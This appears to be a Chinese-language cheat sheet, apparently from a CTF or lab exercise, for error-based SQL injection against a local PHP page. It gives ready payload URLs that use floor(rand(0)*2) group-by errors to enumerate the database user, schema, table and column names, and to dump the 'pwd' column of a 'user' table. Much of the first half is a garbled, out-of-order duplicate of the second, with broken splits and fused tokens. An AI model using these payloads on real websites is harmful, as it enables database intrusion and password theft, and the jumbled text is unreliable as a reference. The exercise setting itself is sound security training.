一个带get参数的网站并且不从数据库返回数据,但存在报错信息
http://127.0.0.1/index.php?id=1
http://127.0.0.1/index.php?id=1'
http://127.0.0.1/index.php?id=1' order by 4%23
注:
其中1,2,3为存在的字段数
SQL语句处为要输入的SQL注入语句
查看当前数据库账号的权限:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,2,3 from(select+count(*),concat(floor(rand(0)*2),(select user()))a from information_schema.tables group by a)b%23
select schema_name from information_schema.schemata limit 5,1
))a from information_schema.tables group by a)b%23
注:
limit x,1 中x表示要查询的第x个数据库名,从0开始算起
select table_name from information_schema.tables where table_schema=database() limit0,1
))a from information_schema.tables group by a)b%23
注:
database() 表示使用当前数据库,如果要跨库查询,将库名十六进制编码后填入其中,如:table_schema=0x111111111;
limit 0,1 表示查询第一个表名,修改0查询其他;
select column_name from information_schema.columns where table_schema=database() and table_name=0x11111111limit 2,1
))a from information_schema.tables group by a)b%23
注:
0x11111111 为要查询的表名的十六进制
limit 2,1 为要查询的第2个字段
select pwd from user
))a from information_schema.tables group by a)b%23
http://127.0.0.1/index.php?id=1
http://127.0.0.1/index.php?id=1'
查看字段情况:
http://127.0.0.1/index.php?id=1' order by 3%23http://127.0.0.1/index.php?id=1' order by 4%23
报错注入语句格式:
http://127.0.0.1/index.php?id=1' and 1=2 union select1,2,3 from(select+count(*),concat(floor(rand(0)*2),(SQL语句))a from information_schema.tables group by a)b%23注:
其中1,2,3为存在的字段数
SQL语句处为要输入的SQL注入语句
查看当前数据库账号的权限:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,2,3 from(select+count(*),concat(floor(rand(0)*2),(select user()))a from information_schema.tables group by a)b%23
爆库名:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,2,3 from (select+count(*),concat(floor(rand(0)*2),(select schema_name from information_schema.schemata limit 5,1
))a from information_schema.tables group by a)b%23
注:
limit x,1 中x表示要查询的第x个数据库名,从0开始算起
爆表名:
http://127.0.0.1/index.php?id=1' and 1=2 unionselect 1,2,3 from (select+count(*),concat(floor(rand(0)*2),(select table_name from information_schema.tables where table_schema=database() limit0,1
))a from information_schema.tables group by a)b%23
注:
database() 表示使用当前数据库,如果要跨库查询,将库名十六进制编码后填入其中,如:table_schema=0x111111111;
limit 0,1 表示查询第一个表名,修改0查询其他;
爆字段:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,2,3 from (select+count(*),concat(floor(rand(0)*2),(select column_name from information_schema.columns where table_schema=database() and table_name=0x11111111limit 2,1
))a from information_schema.tables group by a)b%23
注:
0x11111111 为要查询的表名的十六进制
limit 2,1 为要查询的第2个字段
爆pwd:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,2,3 from(select+count(*),concat(floor(rand(0)*2),(select pwd from user
))a from information_schema.tables group by a)b%23
拿到最终的key